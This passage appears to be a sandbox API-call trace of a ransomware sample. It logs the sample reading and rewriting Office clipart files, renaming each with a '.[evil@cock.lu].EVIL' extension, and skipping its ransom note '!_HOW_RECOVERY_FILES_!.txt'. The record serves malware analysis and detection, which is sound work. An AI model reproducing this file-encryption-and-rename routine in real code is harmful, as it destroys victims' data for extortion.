(_String1="J0198234.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198234.WMF") returned 0x0 [0151.127] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF") returned 0x45 [0151.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.129] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa69e, lpOverlapped=0x0) returned 1 [0151.139] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.139] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.139] _errno () returned 0x84b1160840 [0151.139] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.139] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xa6a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa6a0, lpOverlapped=0x0) returned 1 [0151.140] CloseHandle (hObject=0x1a8) returned 1 [0151.140] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.140] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.140] __uncaught_exception () returned 0x84b1160800 [0151.140] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.140] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf.[evil@cock.lu].evil")) returned 1 [0151.141] ??_V@YAXPEAX@Z () returned 0x1 [0151.145] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF", dwFileAttributes=0x200) returned 0 [0151.146] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.146] wcsstr (_Str="J0198372.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.146] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF") returned 69 [0151.146] wcscmp (_String1="J0198372.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.146] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198372.WMF") returned 0x0 [0151.146] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF") returned 0x45 [0151.146] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.148] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6f9c, lpOverlapped=0x0) returned 1 [0151.158] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.158] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.158] _errno () returned 0x84b1160840 [0151.158] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.158] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x6fa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6fa0, lpOverlapped=0x0) returned 1 [0151.158] CloseHandle (hObject=0x1a8) returned 1 [0151.159] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.159] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.159] __uncaught_exception () returned 0x84b1160800 [0151.159] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.160] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf.[evil@cock.lu].evil")) returned 1 [0151.161] ??_V@YAXPEAX@Z () returned 0x1 [0151.164] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF", dwFileAttributes=0x200) returned 0 [0151.164] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.165] wcsstr (_Str="J0198377.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.165] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF") returned 69 [0151.165] wcscmp (_String1="J0198377.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.165] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198377.WMF") returned 0x0 [0151.165] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF") returned 0x45 [0151.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.167] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9d6c, lpOverlapped=0x0) returned 1 [0151.177] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.177] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.177] _errno () returned 0x84b1160840 [0151.177] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.177] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x9d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9d80, lpOverlapped=0x0) returned 1 [0151.177] CloseHandle (hObject=0x1a8) returned 1 [0151.178] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.178] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.178] __uncaught_exception () returned 0x84b1160800 [0151.178] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.178] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf.[evil@cock.lu].evil")) returned 1 [0151.179] ??_V@YAXPEAX@Z () returned 0x1 [0151.183] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF", dwFileAttributes=0x200) returned 0 [0151.183] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.183] wcsstr (_Str="J0198447.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.183] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF") returned 69 [0151.183] wcscmp (_String1="J0198447.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.183] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198447.WMF") returned 0x0 [0151.183] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF") returned 0x45 [0151.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.186] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc20c, lpOverlapped=0x0) returned 1 [0151.197] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.197] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.197] _errno () returned 0x84b1160840 [0151.197] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.197] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xc220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc220, lpOverlapped=0x0) returned 1 [0151.197] CloseHandle (hObject=0x1a8) returned 1 [0151.197] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.197] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.197] __uncaught_exception () returned 0x84b1160800 [0151.197] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.198] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf.[evil@cock.lu].evil")) returned 1 [0151.198] ??_V@YAXPEAX@Z () returned 0x1 [0151.201] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF", dwFileAttributes=0x200) returned 0 [0151.201] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.201] wcsstr (_Str="J0198494.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.201] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF") returned 69 [0151.201] wcscmp (_String1="J0198494.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.201] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198494.WMF") returned 0x0 [0151.201] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF") returned 0x45 [0151.201] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.203] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xae08, lpOverlapped=0x0) returned 1 [0151.213] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.213] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.213] _errno () returned 0x84b1160840 [0151.213] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.213] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xae20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xae20, lpOverlapped=0x0) returned 1 [0151.214] CloseHandle (hObject=0x1a8) returned 1 [0151.214] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.214] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.214] __uncaught_exception () returned 0x84b1160800 [0151.214] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.214] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf.[evil@cock.lu].evil")) returned 1 [0151.215] ??_V@YAXPEAX@Z () returned 0x1 [0151.218] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF", dwFileAttributes=0x200) returned 0 [0151.218] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.218] wcsstr (_Str="J0198712.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.218] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF") returned 69 [0151.218] wcscmp (_String1="J0198712.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.218] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0198712.WMF") returned 0x0 [0151.218] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF") returned 0x45 [0151.218] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.220] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe17a, lpOverlapped=0x0) returned 1 [0151.229] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.229] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.229] _errno () returned 0x84b1160840 [0151.229] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.229] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xe180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe180, lpOverlapped=0x0) returned 1 [0151.229] CloseHandle (hObject=0x1a8) returned 1 [0151.230] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.230] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.230] __uncaught_exception () returned 0x84b1160800 [0151.230] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.230] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf.[evil@cock.lu].evil")) returned 1 [0151.231] ??_V@YAXPEAX@Z () returned 0x1 [0151.235] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF", dwFileAttributes=0x200) returned 0 [0151.235] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.235] wcsstr (_Str="J0199279.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.235] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF") returned 69 [0151.235] wcscmp (_String1="J0199279.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.235] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199279.WMF") returned 0x0 [0151.235] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF") returned 0x45 [0151.235] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.238] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x714e, lpOverlapped=0x0) returned 1 [0151.246] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.246] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.246] _errno () returned 0x84b1160840 [0151.246] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.246] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x7160, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7160, lpOverlapped=0x0) returned 1 [0151.246] CloseHandle (hObject=0x1a8) returned 1 [0151.247] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.247] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.247] __uncaught_exception () returned 0x84b1160800 [0151.247] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.247] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf.[evil@cock.lu].evil")) returned 1 [0151.248] ??_V@YAXPEAX@Z () returned 0x1 [0151.252] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF", dwFileAttributes=0x200) returned 0 [0151.252] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.252] wcsstr (_Str="J0199303.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.252] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF") returned 69 [0151.252] wcscmp (_String1="J0199303.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.252] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199303.WMF") returned 0x0 [0151.252] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF") returned 0x45 [0151.253] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.256] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c4e, lpOverlapped=0x0) returned 1 [0151.264] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.264] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.264] _errno () returned 0x84b1160840 [0151.264] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.264] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c60, lpOverlapped=0x0) returned 1 [0151.264] CloseHandle (hObject=0x1a8) returned 1 [0151.265] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.265] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.265] __uncaught_exception () returned 0x84b1160800 [0151.265] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.265] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf.[evil@cock.lu].evil")) returned 1 [0151.269] ??_V@YAXPEAX@Z () returned 0x1 [0151.272] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF", dwFileAttributes=0x200) returned 0 [0151.272] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.272] wcsstr (_Str="J0199307.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.272] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF") returned 69 [0151.272] wcscmp (_String1="J0199307.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.272] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199307.WMF") returned 0x0 [0151.272] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF") returned 0x45 [0151.273] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf"), 